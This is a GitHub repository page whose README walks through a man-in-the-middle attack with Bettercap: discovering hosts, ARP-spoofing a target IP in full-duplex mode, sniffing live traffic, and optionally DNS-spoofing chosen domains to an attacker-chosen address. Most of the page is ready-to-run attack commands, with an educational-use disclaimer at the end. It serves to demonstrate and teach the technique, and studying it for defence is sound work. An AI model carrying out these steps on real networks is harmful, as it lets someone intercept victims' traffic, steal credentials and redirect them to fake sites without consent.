Skip to content
/ MITM-Attack-ARP-Spoofing-Bettercap Public

A demonstration of Man-in-the-Middle (MITM) attack using ARP spoofing with Bettercap. Includes network sniffing, DNS spoofing, and real-time traffic interception techniques.

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

patricnilackshan/MITM-Attack-ARP-Spoofing-Bettercap

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 

Repository files navigation

ARP Spoofing using Bettercap for MITM Attack

Overview

This project demonstrates how to perform a Man-in-the-Middle (MITM) attack using Bettercap through ARP spoofing. The goal is to intercept and manipulate network traffic between a victim device and the router. This attack showcases how ARP spoofing can be used for network sniffing and DNS spoofing.

Tools and Technologies

  • Bettercap: A powerful, flexible tool for network monitoring and attacks.
  • ARP Spoofing: Redirect network traffic by pretending to be the router or another device in the network.
  • DNS Spoofing: Redirect specific domain requests to a designated IP address.
  • Network Sniffing: Capturing and viewing real-time network traffic.

Steps to Perform ARP Spoofing with Bettercap

  1. Install Bettercap: Make sure Bettercap is installed on your system.

    sudo apt install bettercap

  2. Start Bettercap: Launch Bettercap’s command-line interface (CLI).

    sudo bettercap

  3. Discover Devices in the Network:

    • Turn on network probing to find devices on the network.
    net.probe on
    • View the discovered devices.
    net.show

  4. Enable Full Duplex Mode for ARP Spoofing:

    • Enable full-duplex ARP spoofing to act as a relay between the victim and the router.
    set arp.spoof.fullduplex true

  5. Set Target Device:

    • Set the victim’s IP address as the target (replace 192.168.1.7 with the target's IP address).
    set arp.spoof.targets 192.168.1.7

  6. Activate ARP Spoofing:

    • Begin ARP spoofing to intercept network traffic.
    arp.spoof on

  7. View Real-Time Network Traffic:

    • Enable network sniffing to monitor live traffic.
    net.sniff on

DNS Spoofing (Optional)

If you want to redirect the victim’s traffic to a specific IP address, you can perform DNS spoofing as well.

  1. Set DNS Spoofing Address:

    • Redirect DNS queries to the desired IP address (replace <IP> with the target IP).
    set dns.spoof.address <IP>

  2. Set Domains for Spoofing:

    • Specify which domain(s) to spoof (e.g., example.com).
    set dns.spoof.domains <URL>

  3. Activate DNS Spoofing:

    dns.spoof on

Disclaimer

This project is for educational purposes only. Unauthorized use of ARP or DNS spoofing may be illegal and is not permitted without explicit permission. Always ensure you have the proper authorization before conducting such tests.

References

About

A demonstration of Man-in-the-Middle (MITM) attack using ARP spoofing with Bettercap. Includes network sniffing, DNS spoofing, and real-time traffic interception techniques.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published